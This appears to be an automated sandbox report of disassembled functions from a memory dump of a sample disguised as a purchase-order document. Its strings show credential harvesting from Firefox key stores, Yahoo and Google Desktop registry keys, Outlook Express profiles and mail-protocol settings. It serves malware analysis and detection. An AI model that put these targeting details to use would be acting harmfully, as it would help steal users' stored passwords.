                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                              • strlen.MSVCRT ref: 004440D1
                                                                • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                              • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                              • String ID:
                                                              • API String ID: 577244452-0
                                                              • Opcode ID: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                              • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                              • Opcode Fuzzy Hash: 108565421b69cd6dbca8acf5b44b56258973e1f8a7d6241a540561e46ba32278
                                                              • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                              APIs
                                                                • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                              • _strcmpi.MSVCRT ref: 00404518
                                                              • _strcmpi.MSVCRT ref: 00404536
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$memcpystrlen
                                                              • String ID: imap$pop3$smtp
                                                              • API String ID: 2025310588-821077329
                                                              • Opcode ID: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                              • Instruction ID: 0633fc9c76c4ce8560d4ef140e22cd8797028ee620c68f7eda392c6b656e28f7
                                                              • Opcode Fuzzy Hash: eee60513a4699abb8551f44788d90d37b0e132d8f01c4cdb6b0234843d6a8405
                                                              • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C02D
                                                                • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,75570A60), ref: 00408EBE
                                                                • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,75570A60), ref: 00408E31
                                                                • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                              • API String ID: 2726666094-3614832568
                                                              • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                              • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                              • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                              • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                              APIs
                                                              • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                              • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                              • OpenClipboard.USER32(?), ref: 0040C1B1
                                                              • GetLastError.KERNEL32 ref: 0040C1CA
                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                              • String ID:
                                                              • API String ID: 2014771361-0
                                                              • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                              • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                              • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                              • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                              APIs
                                                              • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                              • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                              • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                              • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcmp$memcpy
                                                              • String ID: global-salt$password-check
                                                              • API String ID: 231171946-3927197501
                                                              • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                              • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                              • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                              • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                              APIs
                                                              • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                              • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                              • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                              • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                              APIs
                                                              • memset.MSVCRT ref: 0040644F
                                                              • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                              • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                              • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                              • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset
                                                              • String ID:
                                                              • API String ID: 438689982-0
                                                              • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                              • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                              • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                              • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                              APIs
                                                                • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                              • memset.MSVCRT ref: 0040330B
                                                              • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                              • strchr.MSVCRT ref: 0040335A
                                                                • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                              • strlen.MSVCRT ref: 0040339C
                                                                • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                              • String ID: Personalities
                                                              • API String ID: 2103853322-4287407858
                                                              • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                              • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                              • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                              • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                              APIs
                                                              • memset.MSVCRT ref: 00444573
                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValuememset
                                                              • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                              • API String ID: 1830152886-1703613266
                                                              • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                              • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                              • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                              • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: winRead
                                                              • API String ID: 1297977491-2759563040
                                                              • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                              • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                              • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                              • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                              APIs
                                                              • memset.MSVCRT ref: 0044955B
                                                              • memset.MSVCRT ref: 0044956B
                                                              • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                              • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID: gj
                                                              • API String ID: 1297977491-4203073231
                                                              • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                              • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                              • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                              • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                              APIs
                                                              • GetParent.USER32(?), ref: 004090C2
                                                              • GetWindowRect.USER32(?,?), ref: 004090CF
                                                              • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                              • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                              • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Window$Rect$ClientParentPoints
                                                              • String ID:
                                                              • API String ID: 4247780290-0
                                                              • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                              • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                              • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                              • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                              APIs
                                                              • _strcmpi.MSVCRT ref: 0040E134
                                                              • _strcmpi.MSVCRT ref: 0040E14D
                                                              • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi$_mbscpy
                                                              • String ID: smtp
                                                              • API String ID: 2625860049-60245459
                                                              • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                              • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                              • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                              • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                              APIs
                                                                • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                              • memset.MSVCRT ref: 00408258
                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                              Strings
                                                              • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: Close$EnumOpenmemset
                                                              • String ID: Software\Google\Google Desktop\Mailboxes
                                                              • API String ID: 2255314230-2212045309
                                                              • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                              • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                              • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                              • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                              APIs
                                                              • memset.MSVCRT ref: 0040C28C
                                                              • SetFocus.USER32(?,?), ref: 0040C314
                                                                • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: FocusMessagePostmemset
                                                              • String ID: S_@$l
                                                              • API String ID: 3436799508-4018740455
                                                              • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                              • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                              • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                              • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: _mbscpy
                                                              • String ID: C^@$X$ini
                                                              • API String ID: 714388716-917056472
                                                              • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                              • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                              • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                              • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                              APIs
                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                              • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                              • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                              • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                              • String ID: MS Sans Serif
                                                              • API String ID: 3492281209-168460110
                                                              • Opcode ID: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                              • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                              • Opcode Fuzzy Hash: fba1b153f1476fe7d17889d81f23932038493b3a6f8049a49ffc4c2ea38943aa
                                                              • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000009.00000002.2648485614.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000009.00000002.2648485614.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              • Associated: 00000009.00000002.2648485614.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_9_2_400000_Purchase Order Draft for ATPS Inq Ref240912887-ATPS.jbxd
                                                              Similarity
                                                              • API ID: ClassName_strcmpimemset
